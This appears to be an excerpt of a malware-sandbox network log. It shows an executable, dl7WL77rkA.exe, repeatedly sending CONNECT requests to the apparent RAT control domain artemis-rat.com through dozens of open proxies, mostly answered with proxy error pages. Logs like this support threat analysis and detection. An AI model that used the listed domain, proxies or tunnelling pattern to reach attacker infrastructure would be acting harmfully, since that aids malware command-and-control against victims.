                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.968111038 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            257192.168.2.550189142.54.239.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.640146971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            258192.168.2.550679104.20.56.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.640221119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.794991016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            259192.168.2.54996051.79.87.144304643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.643939972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701899052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811343908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852349997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.904412031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            260192.168.2.550597114.129.2.8280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.645248890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.908647060 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            261192.168.2.550689185.162.228.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.646662951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.801178932 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            262192.168.2.55056647.93.114.68883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.659403086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.975790024 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            263192.168.2.55065412.186.205.120803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.664233923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.855669022 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            264192.168.2.550684128.199.5.6588883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.664237022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.843276024 CET270INHTTP/1.1 500 Internal Privoxy Error
                                                                                                                                                                                                                                                            Content-Length: 775
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 17 Jun 2000 12:00:00 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            265192.168.2.550533103.118.46.17680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.671560049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.023422956 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            266192.168.2.550743104.16.213.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.687825918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.842058897 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            267192.168.2.550568103.164.112.123100013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.689908981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.506521940 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            268192.168.2.55058784.39.112.14431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.689938068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.001635075 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            269192.168.2.54999451.210.127.15803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.700489044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.011934996 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
